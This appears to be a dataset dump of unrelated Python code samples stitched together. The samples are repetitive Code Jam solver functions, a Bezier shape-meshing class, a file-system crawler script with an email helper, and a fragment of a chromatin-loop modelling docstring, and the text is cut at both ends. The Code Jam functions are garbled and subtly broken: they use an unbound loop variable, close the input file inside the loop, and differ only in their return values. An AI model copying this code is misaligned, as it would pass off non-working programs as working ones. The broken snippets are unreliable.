input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
% T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return best
def func_8f7d9b18b0f14b1e8ab440a10887730d(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return T
def func_70a941215b834f7eac54b7c1636adfb4(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return p
def func_b4cd67a31efc4ead91b67fbc22e24dac(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return q
def func_a22c619581fb44ae9f584033f0899eb8(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return r
def func_693ed1bad29e4b8a95d978208b7d6f86(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return a
def func_07cf1ae667834722a41368a3a3a52f0c(infile):
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return b
def func_c172c6329ac8403aae7f07e75e313b64():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
return a
def func_6c62f09ceaea47129e83e1b939749cb9():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
return T
def func_01dc285a49b245bb9b0949a7ec01a023():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p | |
<gh_stars>10-100
# Generic imports
import os, os.path
import math
import pygmsh
import meshio
import scipy.special
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
# Custom imports
from meshes_utils import *
### ************************************************
### Class defining shape object
class Shape:
### ************************************************
### Constructor
def __init__(self,
name ='shape',
control_pts =None,
n_control_pts =None,
n_sampling_pts=None,
radius =None,
edgy =None):
if (name is None): name = 'shape'
if (control_pts is None): control_pts = np.array([])
if (n_control_pts is None): n_control_pts = 0
if (n_sampling_pts is None): n_sampling_pts = 0
if (radius is None): radius = np.array([])
if (edgy is None): edgy = np.array([])
self.name = name
self.control_pts = control_pts
self.n_control_pts = n_control_pts
self.n_sampling_pts = n_sampling_pts
self.curve_pts = np.array([])
self.area = 0.0
self.index = 0
if (len(radius) == n_control_pts): self.radius = radius
if (len(radius) == 1): self.radius = radius*np.ones([n_control_pts])
if (len(edgy) == n_control_pts): self.edgy = edgy
if (len(edgy) == 1): self.edgy = edgy*np.ones([n_control_pts])
subname = name.split('_')
if (len(subname) == 2): # name is of the form shape_?.xxx
self.name = subname[0]
index = subname[1].split('.')[0]
self.index = int(index)
if (len(subname) > 2): # name contains several '_'
print('Please do not use several "_" char in shape name')
quit()
if (len(control_pts) > 0):
self.control_pts = control_pts
self.n_control_pts = len(control_pts)
### ************************************************
### Reset object
def reset(self):
self.name = 'shape'
self.control_pts = np.array([])
self.n_control_pts = 0
self.n_sampling_pts = 0
self.radius = np.array([])
self.edgy = np.array([])
self.curve_pts = np.array([])
self.area = 0.0
### ************************************************
### Generate shape
def generate(self, *args, **kwargs):
# Handle optional argument
centering = kwargs.get('centering', True)
cylinder = kwargs.get('cylinder', False)
magnify = kwargs.get('magnify', 1.0)
# Generate random control points if empty
if (len(self.control_pts) == 0):
if (cylinder):
self.control_pts = generate_cylinder_pts(self.n_control_pts)
else:
self.control_pts = generate_random_pts(self.n_control_pts)
# Magnify
self.control_pts *= magnify
# Center set of points
if (centering):
center = np.mean(self.control_pts, axis=0)
self.control_pts -= center
# Sort points counter-clockwise
#control_pts, radius, edgy = ccw_sort(self.control_pts,
# self.radius,
# self.edgy)
control_pts = np.array(self.control_pts)
radius = np.array(self.radius)
edgy = np.array(self.edgy)
#self.control_pts = control_pts
#self.radius = radius
#self.edgy = edgy
# Create copy of control_pts for further modification
augmented_control_pts = control_pts
# Add first point as last point to close curve
augmented_control_pts = np.append(augmented_control_pts,
np.atleast_2d(augmented_control_pts[0,:]), axis=0)
# Compute list of cartesian angles from one point to the next
vector = np.diff(augmented_control_pts, axis=0)
angles = np.arctan2(vector[:,1],vector[:,0])
wrap = lambda angle: (angle >= 0.0)*angle + (angle < 0.0)*(angle+2*np.pi)
angles = wrap(angles)
# Create a second list of angles shifted by one point
# to compute an average of the two at each control point.
# This helps smoothing the curve around control points
angles1 = angles
angles2 = np.roll(angles,1)
angles = edgy*angles1 + (1.0-edgy)*angles2 + (np.abs(angles2-angles1) > np.pi)*np.pi
# Add first angle as last angle to close curve
angles = np.append(angles, [angles[0]])
# Compute curve segments
local_curves = []
for i in range(0,len(augmented_control_pts)-1):
local_curve = generate_bezier_curve(augmented_control_pts[i,:],
augmented_control_pts[i+1,:],
angles[i],
angles[i+1],
self.n_sampling_pts,
radius[i])
local_curves.append(local_curve)
curve = np.concatenate([c for c in local_curves])
x, y = curve.T
z = np.zeros(x.size)
self.curve_pts = np.column_stack((x,y,z))
self.curve_pts = remove_duplicate_pts(self.curve_pts)
# Compute area
self.compute_area()
### ************************************************
### Write image
def generate_image(self, *args, **kwargs):
# Handle optional argument
special_pt = kwargs.get('special_pt', None)
plot_pts = kwargs.get('plot_pts', False)
override_name = kwargs.get('override_name', '')
show_quadrants = kwargs.get('show_quadrants', 'False')
quad_radius = kwargs.get('quad_radius', 1.0)
xmin = kwargs.get('xmin', -5.0)
xmax = kwargs.get('xmax', 10.0)
ymin = kwargs.get('ymin', -5.0)
ymax = kwargs.get('ymax', 5.0)
# Plot shape
plt.xlim([xmin,xmax])
plt.ylim([ymin,ymax])
plt.axis('off')
plt.gca().set_aspect('equal', adjustable='box')
plt.fill(self.curve_pts[:,0],
self.curve_pts[:,1],
'black',
linewidth=2.5)
# Plot points
# Each point gets a different color
if (plot_pts):
colors = matplotlib.cm.ocean(np.linspace(0,1,self.n_control_pts))
plt.scatter(self.control_pts[:,0],
self.control_pts[:,1],
color=colors)
# Plot special point
if (special_pt) is not None:
plt.plot(self.control_pts[special_pt,0],
self.control_pts[special_pt,1],
'o',
color=(1.0,0.494,0.180))
# Plot quadrants
if (show_quadrants):
for pt in range(self.n_control_pts):
dangle = (360.0/float(self.n_control_pts))
angle = dangle*float(pt)+dangle/2.0
x = quad_radius*math.cos(math.radians(angle))
y = quad_radius*math.sin(math.radians(angle))
plt.plot([0, x],[0, y],color='w')
circle = plt.Circle((0,0),quad_radius,fill=False,color='w')
plt.gcf().gca().add_artist(circle)
# Save image
filename = self.name+'_'+str(self.index)+'.png'
if (override_name != ''): filename = override_name
plt.savefig(filename,
dpi=200,
bbox_inches='tight',
pad_inches=0,
facecolor=(0.784,0.773,0.741))
plt.clf()
### ************************************************
### Write csv
def write_csv(self):
with open(self.name+'_'+str(self.index)+'.csv','w') as file:
# Write header
file.write('{} {}\n'.format(self.n_control_pts,
self.n_sampling_pts))
# Write radii
for i in range(0,self.n_control_pts):
file.write('{}\n'.format(self.radius[i]))
# Write edgy
for i in range(0,self.n_control_pts):
file.write('{}\n'.format(self.edgy[i]))
# Write control points coordinates
for i in range(0,self.n_control_pts):
file.write('{} {}\n'.format(self.control_pts[i,0],
self.control_pts[i,1]))
### ************************************************
### Read csv and initialize shape with it
def read_csv(self, filename, *args, **kwargs):
# Handle optional argument
keep_numbering = kwargs.get('keep_numbering', False)
if (not os.path.isfile(filename)):
print('I could not find csv file: '+filename)
print('Exiting now')
exit()
self.reset()
sfile = filename.split('.')
sfile = sfile[-2]
sfile = sfile.split('/')
name = sfile[-1]
if (keep_numbering):
sname = name.split('_')
name = sname[0]
name = name+'_'+str(self.index)
x = []
y = []
radius = []
edgy = []
with open(filename) as file:
header = file.readline().split()
n_control_pts = int(header[0])
n_sampling_pts = int(header[1])
for i in range(0,n_control_pts):
rad = file.readline().split()
radius.append(float(rad[0]))
for i in range(0,n_control_pts):
edg = file.readline().split()
edgy.append(float(edg[0]))
for i in range(0,n_control_pts):
coords = file.readline().split()
x.append(float(coords[0]))
y.append(float(coords[1]))
control_pts = np.column_stack((x,y))
self.__init__(name,
control_pts,
n_control_pts,
n_sampling_pts,
radius,
edgy)
### ************************************************
### Mesh shape
def mesh(self, *args, **kwargs):
# Handle optional argument
mesh_domain = kwargs.get('mesh_domain', False)
xmin = kwargs.get('xmin', -5.0)
xmax = kwargs.get('xmax', 10.0)
ymin = kwargs.get('ymin', -5.0)
ymax = kwargs.get('ymax', 5.0)
shape_h = kwargs.get('shape_h', 10.0)
domain_h = kwargs.get('domain_h', 20.0)
mesh_format = kwargs.get('mesh_format', 'mesh')
# Convert curve to polygon
mesh_size = 1.0
min_size = mesh_size*shape_h
geom = pygmsh.built_in.Geometry()
poly = geom.add_polygon(self.curve_pts,
mesh_size*shape_h,
make_surface=not mesh_domain)
# Mesh domain if necessary
if (mesh_domain):
# Compute an intermediate mesh size
border = geom.add_rectangle(xmin, xmax,
ymin, ymax,
0.0,
mesh_size*domain_h,
holes=[poly.line_loop])
# Generate mesh and write in medit format
try:
mesh = pygmsh.generate_mesh(geom,
extra_gmsh_arguments=["-v", "0"])
except AssertionError:
print('Meshing failed')
return False, 0, 0.0
else:
# Compute data from mesh
n_tri = len(mesh.cells['triangle'])
# Remove vertex keywork from cells dictionnary
# to avoid warning message from meshio
del mesh.cells['vertex']
# Remove lines if output format is xml
if (mesh_format == 'xml'): del mesh.cells['line']
# Write mesh
filename = self.name+'_'+str(self.index)+'.'+mesh_format
meshio.write_points_cells(filename, mesh.points, mesh.cells)
return True, n_tri
### ************************************************
### Get shape bounding box
def compute_bounding_box(self):
x_max, y_max = np.amax(self.control_pts,axis=0)
x_min, y_min = np.amin(self.control_pts,axis=0)
dx = x_max - x_min
dy = y_max - y_min
return dx, dy
### ************************************************
### Modify shape given a deformation field
def modify_shape_from_field(self, deformation, *args, **kwargs):
# Handle optional argument
replace = kwargs.get('replace', False)
pts_list = kwargs.get('pts_list', [])
# Check inputs
if (pts_list == []):
if (len(deformation[:,0]) != self.n_control_pts):
print('Input deformation field does not have right length')
quit()
if (len(deformation[0,:]) not in [2, 3]):
print('Input deformation field does not have right width')
quit()
if (pts_list != []):
if (len(pts_list) != len(deformation)):
print('Lengths of pts_list and deformation are different')
quit()
# If shape is to be replaced entirely
if ( replace):
# If a list of points is provided
if (pts_list != []):
for i in range(len(pts_list)):
self.control_pts[pts_list[i],0] = deformation[i,0]
self.control_pts[pts_list[i],1] = deformation[i,1]
self.edgy[pts_list[i]] = deformation[i,2]
# Otherwise
if (pts_list == []):
self.control_pts[:,0] = deformation[:,0]
self.control_pts[:,1] = deformation[:,1]
self.edgy[:] = deformation[:,2]
# Otherwise
if (not replace):
# If a list of points to deform is provided
if (pts_list != []):
for i in range(len(pts_list)):
self.control_pts[pts_list[i],0] += deformation[i,0]
self.control_pts[pts_list[i],1] += deformation[i,1]
self.edgy[pts_list[i]] += deformation[i,2]
# Otherwise
if (pts_list == []):
self.control_pts[:,0] += deformation[:,0]
self.control_pts[:,1] += deformation[:,1]
self.edgy[:] += deformation[:,2]
# Increment shape index
self.index += 1
### ************************************************
### Compute shape area
def compute_area(self):
self.area = 0.0
# Use Green theorem to compute area
for i in range(0,len(self.curve_pts)-1):
x1 = self.curve_pts[i-1,0]
x2 = self.curve_pts[i, 0]
y1 = self.curve_pts[i-1,1]
y2 = self.curve_pts[i, 1]
self.area += 2.0*(y1+y2)*(x2-x1)
### End of class Shape
### ************************************************
### ************************************************
### Compute distance between two points
def compute_distance(p1, p2):
return np.sqrt(np.sum((p2-p1)**2))
### ************************************************
### Generate n_pts random points in the unit square
def generate_random_pts(n_pts):
return np.random.rand(n_pts,2)
### ************************************************
### Generate cylinder points
def generate_cylinder_pts(n_pts):
if (n_pts < 4):
print('Not enough points to generate cylinder')
exit()
pts = np.zeros([n_pts, 2])
ang = 2.0*math.pi/n_pts
for i in range(0,n_pts):
pts[i,:] = [math.cos(float(i)*ang),math.sin(float(i)*ang)]
return pts
### ************************************************
### Compute minimal distance between successive pts in array
def compute_min_distance(pts):
dist_min = 1.0e20
for i in range(len(pts)-1):
p1 = pts[i ,:]
p2 = pts[i+1,:]
dist = compute_distance(p1,p2)
dist_min = | |
#! /usr/bin/env python3
# Script to crawl the file system for changed files
#
# fs-crawler dirkpetersen / Oct 2019
#
import sys, os, argparse, subprocess, re, time, datetime, tempfile, random, threading, filecmp
class KeyboardInterruptError(Exception): pass
def main():
#log = logger('fs-crawler', args.debug)
#log.info('starting to check folder %s for files older than %s days...' % (args.folder, args.days))
#log.debug('Parsed arguments: %s' % args)
start = time.time()
interval = 1
maxinterval = 10
lastcheck = 0
lastt = 0
currdir = os.getcwd()
curruser = os.getlogin() #pwd.getpwuid(os.getuid()).pw_name
tmpdir = tempfile.gettempdir()
days_back_as_secs = time.time() - (args.days * 24 * 3600)
days_back_datestr = str(datetime.date.today() + datetime.timedelta(args.days * -1)) # e.g. '2014-07-01'
filedict = {} # list of files to delete (grouped by key uid)
infodict = {} # contains list per uid: numfiles, sizefiles, numwarnfiles, sizewarnfiles
if args.folder == '/':
print('root folder not allowed !')
return False
numfiles=0
numfolders=0
for root, folders, files in mywalk(args.folder,noparallel=args.noparallel):
#print(root)
#for folder in folders:
#print ('...folder:%s' % folder)
# check if the user wanted to archive
numfolders+=1
numfiles+=len(files)
check = time.time()
if lastcheck+interval<check:
t=numfolders+numfiles
print ("folders: %s, files: %s, avg objects/s: %s, last objects/s: %s, current path: %s"
% (numfolders, numfiles, "{0:.0f}".format(t/(check-start)), "{0:.0f}".format((t-lastt)/(check-lastcheck)), root))
lastcheck=check
lastt=t
interval+=1
if maxinterval<=interval:
interval=maxinterval
if args.target:
troot = root.replace(args.folder,args.target)
if os.path.exists(troot):
dc = filecmp.dircmp(root, root.replace(args.folder,args.target), ignore=['.snapshot'])
if dc.left_list:
print ('*** Copy -> :', dc.left_list)
elif dc.right_list:
print ('*** Delete -> :', dc.right_list)
continue
for f in files:
p=os.path.join(root,f)
if args.nostat:
continue
stat=getstat(p)
if not stat:
continue
recent_time = stat.st_ctime
if stat.st_mtime > recent_time:
recent_time = stat.st_mtime
if stat.st_uid not in infodict:
infodict[stat.st_uid] = [0, 0, 0, 0]
if recent_time >= days_back_as_secs:
if stat.st_uid not in filedict:
filedict[stat.st_uid] = list()
filedict[stat.st_uid].append(p)
infodict[stat.st_uid][0]+=1
infodict[stat.st_uid][1]+=stat.st_size
infodict[stat.st_uid][2]+=1
infodict[stat.st_uid][3]+=stat.st_size
for k, v in filedict.items():
user=uid2user(k)
random.shuffle(v)
fn=len(v)
if fn>30:
fn=30
print("\n ##### FILES <= %s DAYS OLD ##########################################################" % args.days)
print("Total of %s files (%s GB total) owned by '%s'" % (infodict[k][0], "{0:.3f}".format(infodict[k][1]/float(1073741824)), user))
print('List of files that would have been backed up (max 30 randomly selected files):')
for i in range(fn):
print(v[i])
end = time.time()
print("\nTotal Time: %s sec (%s min)" % ("{0:.1f}".format(end-start),"{0:.1f}".format((end-start)/60)))
def startswithpath(pathlist, pathstr):
""" checks if at least one of the paths in a list of paths starts with a string """
for path in pathlist:
if (os.path.join(pathstr, '')).startswith(path):
return True
return False
def getstartpath(pathlist, pathstr):
""" return the path from pathlist that is the frist part of pathstr"""
for path in pathlist:
if (os.path.join(pathstr, '')).startswith(path):
return path
return ''
def getstat(path):
""" returns the stat information of a file"""
statinfo=None
try:
statinfo=os.lstat(path)
except (IOError, OSError) as e: # FileNotFoundError only since python 3.3
if args.debug:
sys.stderr.write(str(e))
except:
raise
return statinfo
def setfiletime(path,attr="atime"):
""" sets the a time of a file to the current time """
try:
statinfo=getstat(path)
if attr=="atime" or attr=="all":
os.utime(path,(time.time(),statinfo.st_atime))
if attr=="mtime" or attr=="all":
os.utime(path,(time.time(),statinfo.st_mtime))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def uid2user(uidNumber):
""" attempts to convert uidNumber to username """
try:
import pwd
return pwd.getpwuid(int(uidNumber)).pw_name
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return str(uidNumber)
def list2file(mylist,path):
""" dumps a list into a text file, one line per item"""
try:
with open(path,'w') as f:
for item in mylist:
f.write("{}\r\n".format(item))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def pathlist2file(mylist,path,root):
""" dumps a list into a text file, one line per item, but removes
a root folder from all paths. Used for --files-from feature in rsync"""
try:
with open(path,'w') as f:
for item in mylist:
f.write("{}\r\n".format(item[len(root):]))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def mywalk(top, noparallel=False, skipdirs=['.snapshot',]):
""" returns subset of os.walk """
if noparallel:
for root, dirs, files in os.walk(top,topdown=True,onerror=walkerr):
for skipdir in skipdirs:
if skipdir in dirs:
dirs.remove(skipdir) # don't visit this directory
yield root, dirs, files
else:
for root, dirs, files in walk(top):
for skipdir in skipdirs:
if skipdir in dirs:
dirs.remove(skipdir) # don't visit this directory
yield root, dirs, files
def walkerr(oserr):
sys.stderr.write(str(oserr))
sys.stderr.write('\n')
return 0
def walk(top, threads=36):
"""Multi-threaded version of os.walk().
from here: https://gist.github.com/jart/0a71cde3ca7261f77080a3625a21672b
This routine provides multiple orders of a magnitude performance improvement
when top is mapped to a network filesystem where i/o operations are slow, but
unlimited. For spinning disks it should still run faster regardless of thread
count because it uses a LIFO scheduler that guarantees locality. For SSDs it
will go tolerably slower.
The more exotic coroutine features of os.walk() can not be supported, such as
the ability to selectively inhibit recursion by mutating subdirs.
Args:
top: Path of parent directory to search recursively.
threads: Size of fixed thread pool.
Yields:
A (path, subdirs, files) tuple for each directory within top, including
itself. These tuples come in no particular order; however, the contents of
each tuple itself is sorted.
"""
if not os.path.isdir(top):
return
lock = threading.Lock()
on_input = threading.Condition(lock)
on_output = threading.Condition(lock)
state = {'tasks': 1}
paths = [top]
output = []
def worker():
while True:
with lock:
while True:
if not state['tasks']:
output.append(None)
on_output.notify()
return
if not paths:
on_input.wait()
continue
path = paths.pop()
break
try:
dirs = []
files = []
for item in os.listdir(path): #for item in sorted(os.listdir(path))
subpath = os.path.join(path, item)
if os.path.isdir(subpath):
dirs.append(item)
with lock:
state['tasks'] += 1
paths.append(subpath)
on_input.notify()
else:
files.append(item)
with lock:
output.append((path, dirs, files))
on_output.notify()
except OSError as e:
print(e, file=sys.stderr)
finally:
with lock:
state['tasks'] -= 1
if not state['tasks']:
on_input.notifyAll()
workers = [threading.Thread(target=worker,
name="fastio.walk %d %s" % (i, top))
for i in range(threads)]
for w in workers:
w.start()
while threads or output: # TODO(jart): Why is 'or output' necessary?
with lock:
while not output:
on_output.wait()
item = output.pop()
if item:
yield item
else:
threads -= 1
def send_mail(to, subject, text, attachments=[], cc=[], bcc=[], smtphost="", fromaddr=""):
if sys.version_info[0] == 2:
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
else:
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders as Encoders
from string import Template
import socket
import smtplib
if not isinstance(to,list):
print("the 'to' parameter needs to be a list")
return False
if len(to)==0:
print("no 'to' email addresses")
return False
myhost=socket.getfqdn()
if smtphost == '':
smtphost = get_mx_from_email_or_fqdn(myhost)
if not smtphost:
sys.stderr.write('could not determine smtp mail host !\n')
if fromaddr == '':
fromaddr = os.path.basename(__file__) + '-no-reply@' + \
'.'.join(myhost.split(".")[-2:]) #extract domain from host
tc=0
for t in to:
if '@' not in t:
# if no email domain given use domain from local host
to[tc]=t + '@' + '.'.join(myhost.split(".")[-2:])
tc+=1
message = MIMEMultipart()
message['From'] = fromaddr
message['To'] = COMMASPACE.join(to)
message['Date'] = formatdate(localtime=True)
message['Subject'] = subject
message['Cc'] = COMMASPACE.join(cc)
message['Bcc'] = COMMASPACE.join(bcc)
body = Template('This is a notification message from $application, running on \n' + \
'host $host. Please review the following message:\n\n' + \
'$notify_text\n\nIf output is being captured, you may find additional\n' + \
'information in your logs.\n'
)
host_name = socket.gethostname()
full_body = body.substitute(host=host_name.upper(), notify_text=text, application=os.path.basename(__file__))
message.attach(MIMEText(full_body))
for f in attachments:
part = MIMEBase('application', 'octet-stream')
part.set_payload(open(f, 'rb').read())
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
message.attach(part)
addresses = []
for x in to:
addresses.append(x)
for x in cc:
addresses.append(x)
for x in bcc:
addresses.append(x)
smtp = smtplib.SMTP(smtphost)
smtp.sendmail(fromaddr, addresses, message.as_string())
smtp.close()
return True
def get_mx_from_email_or_fqdn(addr):
"""retrieve the first mail exchanger dns name from an email address."""
# Match the mail exchanger line in nslookup output.
MX = re.compile(r'^.*\s+mail exchanger = (?P<priority>\d+) (?P<host>\S+)\s*$')
# Find mail exchanger of this email address or the current host
if '@' in addr:
domain = addr.rsplit('@', 2)[1]
else:
domain = '.'.join(addr.rsplit('.')[-2:])
p = os.popen('/usr/bin/nslookup -q=mx %s' % domain, 'r')
mxes = list()
for line in p:
m = MX.match(line)
if m is not None:
mxes.append(m.group('host')[:-1]) #[:-1] just strips the ending dot
if len(mxes) == 0:
return ''
else:
return mxes[0]
def logger(name=None, stderr=False):
import logging, logging.handlers
# | |
oriented in the tandem left configuration;
; i.e., having the "... < .... < ..." type of interaction that
_probably_ results in an _parallel_ chain configuration. parallel
configuration. This configuration results in a far less strongly
binding interaction (about 1/3) but is also often observed in the
experimental data.
'r': This is a CTCF cluster oriented in the tandem right
configuration; ; i.e., having the "... > .... > ..." type of
interaction that _probably_ results in an _parallel_ chain
configuration. This configuration results in a far less strongly
binding interaction (about 1/3) but is also often observed in the
experimental data.
'rp2': RNApolII
's': This is the "simple" pair bond type. These loop structures are
assumed to have the chromatin chains oriented in an unspecifice
orientation (parallel loop or antiparallel loop direction) and the
interactions are presumed to be weak. Note that 's' could also refer
to divergent CTCF interactions; i.e., having the "< ... >" type of
interaction that results in weakly interacting antiparallel chain
configurations similar to the convergent CTCF structures only with far
less binding free energy.
'sa', 'sp': Stem direction specifier. It is important to specify if
the collection of pairs is parallel or antiparallel
oriented. Therefore, we must add a qualifier to this notation; i.e.,
for structures containing the key 'S', we should specify 'sa' (for
simple antiparallel) and 'sp' (for simple parallel).
't' (i.e., "tandem" or "parallel"): This refers to tandem
configurations wherein the particular orientation of the CTCF binding
sites is unknown. In such cases, the program will automatically assign
this label, since the binding energy of 'l' and 'r' are basically
identical at the current level of understanding.
'wyspa': CTCF island.
These additional "bond types" permit us to distinguish between
direction and type of interaction: i.e., RNApolII, CTCF "convergent",
CTCF "tandem".
# #########
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#################################################
############# LINKAGE DEFINITIONS #############
#################################################
160715wkd: I added this additional object because the program will
have to be expanded to handle convergent and tandem structures that
are coupled, and also because some structures will turn out to be
degenerate, so the program should be able to classify multiple
structures with the same energy within the same class. However, I
need to process the structures properly. Therefore, Link contains a
list of objects that have the same free energy Vij and Motif()
represents the objects contained in Link().
==================================================================
180815: I think we can use dictionary to identify objects in
motif. I is true that the handshakes need to be identical, but they
can be accessed with the proper interface.
motifDict = { 'B' : bond(), 'P' : MBL(), 'S' : Stem() ... }
lg[0].motif[0].get_branches()
get_branches(self):
return motifDict['M'].get_branches()
# ==================================================================
"""
def motif_error(name, Ob):
if not Ob == None:
print ("Motif error(%s)" % name, self.Ob.base)
print (type(self.Ob))
print (self.Ob)
else:
print ("Motif error(%s)" % name)
print ("Object NoneType (undefined)")
#
sys.exit(1)
#
class Motif(object):
def __init__(self, i, j, Vij, ctp, btp, branching, pk = [], wyspa = []):
self.Ob = None # <<<=== transition to objects Stem, MBL, XLoop
self.Vij = Vij # the free energy
self.ctp = ctp # connection type
self.btp = btp # bond type
self.branching = branching # what linkage is pointed to
self.tlen = 0.0 # for Stem
self.xi = xi # default Kuhn length
if len(self.branching) == 0:
if ctp == 'B' or ctp == 'W':
"""190517
I encountered the following problem ... Apparently, in
this example, the sequence has two neighboring closely
ligated structures. Because the program must reject
internals, it seems that this created a W-loop for
(12,16) that resembled the B-loop. So it tried to
store it this way. Presently, I think it is ok to just
accept a W as a very strong B-loop. However, this
needs to be paid some attention. The relevant output
from the debugging settings is shown below.
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
dGijh(W) = -3.66, dGbest = -3.66
ijh i( 12) <- ih( 12) <- jh( 14) <- j( 16):
find_ctcf_islands; warning ctcf ij(12,14) --> proximal ligation (j(14) - i(12) = 2)
ijh i( 12) <- ih( 14) <- jh( 16) <- j( 16):
